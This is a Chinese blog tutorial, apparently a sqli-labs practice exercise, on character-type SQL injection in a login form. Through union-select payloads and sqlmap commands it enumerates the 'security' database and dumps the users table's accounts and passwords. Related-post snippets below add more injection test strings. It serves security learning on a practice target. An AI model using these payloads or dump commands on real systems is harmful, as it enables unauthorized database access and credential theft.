黑客学习-sql注入-字符型

最新推荐文章于 2024-05-15 23:16:18 发布
最新推荐文章于 2024-05-15 23:16:18 发布
阅读量1.4k 收藏 4
点赞数 1
分类专栏: 黑客学习 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49349476/article/details/128020989
版权

一、判断是否存在sql漏洞

sql漏洞存在的两个条件

1、参数用户可控:前端传给后端的参数是用户可以控制的,

2、参数带入数据库查询:带入的参数拼接到SQL语句,而且能够成功执行语句

(1)查看username和password的参数名

(2)尝试登录admin-123456和admin-admin两组账号和密码登录,可以看到admin-admin报错,所以表面sql漏洞存在。

二、判断sql数据库漏洞类型

Sql注入根据数据的类型分类两类,数字型和字符型,

uname=1&passwd=1 或者 uname=1&passwd=1’两组进行测试,可以看到uname=1&passwd=1’这一组数据报错,所以这个漏洞存在字符型的漏洞

三、post手工注入

(1)浏览器设置代理

设置代理ip和端口号

(2)burpsuit设置代理,注意这里代理ip和端口号需要和浏览代理一致

返回浏览器,点击刷新浏览器页面

(3)利用union语句联合查询来获取数据库名

命令: uname=1&passwd=1' union select user(),database()--+

union操作符用于合并两个或多个select语句的结果集,联合查询中合并的选择查询必须具有相同的输出字段数、采用相同的顺序并包含相同或兼容的数据类型。)

返回浏览器,发现报错信息如下,所以我们获取到数据库为security

(4)利用union语句联合查询security数据库来获取表名

命令:uname=1&passwd=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--+

返回浏览器可以通过报错信息,我们得到数据库中表有:emails、referers、uagents、users

总共有四个表,根据名字,用户名和密码应该存在users表中

(5)利用union语句联合查询users表来获取字段名

命令:uname=1&passwd=1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+

返回浏览器可以通过报错信息,我们得到中表有三个字段:id、username、password

四、结合SQLMap软件与Burpsuit的抓包信息进行工具注入

(1)、输入test-123456进行输入,进行抓包

把抓到的信息,保存到文件a中(这里是把文件保存到桌面)

进入文件a所在的路径,

(2)利用sqlmap进行注入, sqlmap -r a

(3)获取数据库,命令:

sqlmap -r a --dbs

结果可以看到总共有5个数据库,在前面我们已经知道,我们的目标是security数据库

(4)获取security数据库中表:

sqlmap -r a -D security --table

结果看到数据库有四个表,我们的目标是users表

(5)获取users表中的字段名:

sqlmap -r a -D security -T users --columns

结果看到users表中有三个字段

(6)查看users表中的字段和内容:

sqlmap -r a -D security -T users --dump

结果如下,已经获取到标准所有的账号和密码

纪水一
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL 字符注入
MZa1213123的博客
03-02 4391
CTFHub SQL 字符注入 可以看到我们输入的数据会被单引号所括上 尝试正常的 1 and 1=2 发现没有报错 还是有回显 字符的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显 (不太明白为什么 sql 还是会查询到id = 1 的数据) 这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试 整个的 sql 语句大概是 $ sql = "select Data from table_name .
扫描sql注入与xss攻击的牛b工具
11-02
在网络安全领域,SQL注入和XSS(跨站脚本)攻击是两种常见的威胁,它们针对的是Web应用程序的安全性。本文将详细介绍这两种攻击类以及相关的防范措施,并介绍一款名为"扫描SQL注射与XSS攻击的牛B工具"的实用工具,...
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8847
SQL注入原理-字符注入
SQL注入常见类注入点的判断
最新发布
qq_64395221的博客
05-15 828
字符注入的时候我们需要逃逸单引号,但是php提供了魔术引号开关magic_quotes_gpc和addslashes(),iconv()函数作为防御,特点是自动给传入的参数如单引号,双引号,反斜杠,%00前面加一个反斜杠,进行转义,避免单引号进行逃逸。id=1这种形式的url,这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常,and 1=2回显不正常的情况。sql语句的变量并不是直接传入的变量,而是通过其它的方式保存到了数据库,形成二次注入
SQL注入——字符注入和无列名注入实例(超详细,小白也能学得会)
m0_69151365的博客
01-28 1238
在这一关中,我们首先判断了sql注入,发现是字符注入,我们先是利用order by 来确定该表中的列数,有了列数我们就可以通过database()函数获取到该网站所在的库,我们在information_schema 库中通过刚才获取的库名作为我们的筛选条件在tables表中查询到了该库中的所有表,又在columns表通过过滤table_name和table_schema两个字段查找出users表中的列(字段)信息,到这一步之后我们就直接在users表中查找用户和密码,此时注入完成。
理论篇8:SQL注入(字符注入和数字注入)
aiojay的博客
05-02 2996
SQL注入(字符注入和数字注入),Mysql中 int(3) 类的含义,判断MYSQL注入闭合方式:
sql注入字符注入
m0_63436163的博客
02-01 775
字符注入就是用户在前端的输入未经过过滤或处理用户输入的字符串插入到后端数据库查询语句,后端的SQL查询语句将参数值用引号或者括号等特殊符号包裹起来,改变了原有的查询语句,从而形成字符注入。id=1' and 1=1还是?id = 1' and 1=2都能够正常显示出页面,所以确定他是字符注入。id = 1" and 1=2都能够正常显示出页面,所以确定他是字符注入。id=1 and 1=1还是?id = 1 and 1=2都能够正常显示出页面,所以确定他是字符注入。1、判断是否存在注入点。
sql注入
08-12
SQL注入是一种常见的网络安全威胁,它发生在应用程序未能充分验证或过滤用户输入的数据,导致恶意SQL代码被插入到数据库查询中。这种攻击方式可以被黑客利用来获取、修改、删除数据库中的敏感信息,甚至完全控制...
SQL 注入攻击1.pdf
11-25
SQL注入攻击是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库驱动应用程序。这种攻击方式允许攻击者通过在输入字段中插入恶意SQL代码,操纵网站的后台数据库,从而获取未经授权的数据访问或...
防范网站遭遇SQL注入的方法
03-03
SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户,从而最终获得系统管理员权限。黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序,对...
基于网络安全平台的SQL注入技术研究.pdf
01-04
基于网络安全平台的SQL注入技术研究是指攻击者利用SQL命令将请求的查询字符串插入Web表单递交或输入域名或页面,让后台数据库执行恶意代码的命令,并根据程序返回的结果,获取需要的数据信息。SQL注入攻击可以描述为...
less-1 字符注入
weixin_52348955的博客
10-30 3172
url编码:空格为20%,'为27%,#为23% 字符注入的原理和判断方法在最下面的附录里: 第一步: ?id=999999999' union select 1,2,database()# id设置为很大的原因:如果设置id为1,那么mysql确实查出了两条结果(即id=1查询到的结果和database查询到的结果),但是PHP代码决定了该页面只显示一行记录,所有让id等于一个很大的值或者-1,使得id查询不到结果,就只会显示第二条查询语句的结果 database()前面加了1,2,的原因请看附录 h
字符注入,报错注入
Dug123456_的博客
04-03 2298
输入不同种的语句 显示的不同 存在sql漏洞输入1发现id=‘1’,所以为字符注入
Sql注入的分类:数字+字符
weixin_30496431的博客
07-25 659
Sql注入: 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通过构造恶意的输入,使数据库执行恶意命令,造成数据泄露或者修改内容等,以达到攻击的目的。主要是由于应用程序对用户的输入没有进行严格的过滤而造成的。 一、万能密码 在说sql注入分类之前,先来看一下万能密码的构成原理。万能密码是由于某些程序,通过采用判断sql语句查询...
pikachu 字符SQL注入
m0_61903602的博客
10-25 636
pikachu 靶场 sql 字符
SQL注入——字符union注入
heyingcheng的博客
03-04 566
使用union注入拿到靶机中数据库里的所有用户名和密码查询语句:select 列名 from 表名 where 限定语句以sql-labs中的less-1为例。
Sql注入实验(一)——字符注入(GET)
DaydreamF的博客
04-13 1426
Sqli-libs Less1——字符注入 URL:http://192.168.224.128/sqli/Less-1/ 一、手工注入 1…打开页面,如下所示: 2.根据提示,在url后输入参数id的值,页面显示: 说明,根据传入id参数值的不同,后台服务器查询的数据不同,展示在了前端界面。(参数可控) 3.尝试在参数值的后面输入特殊字符,看页面是否报出数据库语法错误: 报错语句: You have an error in your SQL syntax; check the manual t
sql注入字符和数字
qq_75005708的博客
04-08 2391
id=1%' and 1=1--+/#和?id=1%' and 1=2--+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。id=1' and 1=1--+/#和?id=1' and 1=2--+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。
sql注入学习笔记
qq_44897253的博客
12-02 3581
文章目录什么是sql注入sql注入的原理sql注入方法1.1数字注入1.2字符注入sql注入常见的绕过方式sqlmap的简单使用sql注入的危害sql注入的防范措施 什么是sql注入 sql注入是指web应用程序对用户输入的数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的sql语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 sql注入的原理 sql注入攻击是通过操作输入来修改
可以给我一些学习sql注入的途径吗
03-22
然而,如果您是一名安全研究人员或者想要学习如何保护自己的网站免受 SQL 注入攻击,那么您可以通过以下途径学习 SQL 注入: 1. 在线教程和课程:有很多在线课程和教程可以帮助您学习 SQL 注入的基础知识和技术。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值